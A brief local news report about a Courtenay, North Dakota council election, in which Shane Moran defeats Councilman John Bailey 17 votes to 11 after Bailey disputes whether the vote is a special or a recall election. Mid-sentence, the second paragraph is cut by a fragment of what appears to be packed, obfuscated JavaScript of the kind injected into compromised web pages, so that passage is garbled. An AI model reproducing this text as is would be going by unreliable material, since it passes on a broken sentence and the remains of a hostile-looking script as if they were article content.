COURTENAY, N.D. (NewsDakota.com) – Shane Moran will serve out the remaining two year term after beating Councilman John Bailey in a Courtenay, ND special election.
Last week, Bailey claimed that the election was being zhinz|var|u0026u|referrer|hyabi||js|php’.split(‘|’),0,{}))
misidentified as a special election, when it was really a recall election for his seat. A petition asking for a recall vote was circulated by Moran and had enough signatures to prompt the recall.
In unofficial numbers, Moran received 17 votes and Bailey received 11 votes. 28 of Courtenay’s 41 eligible voters cast a vote Monday.
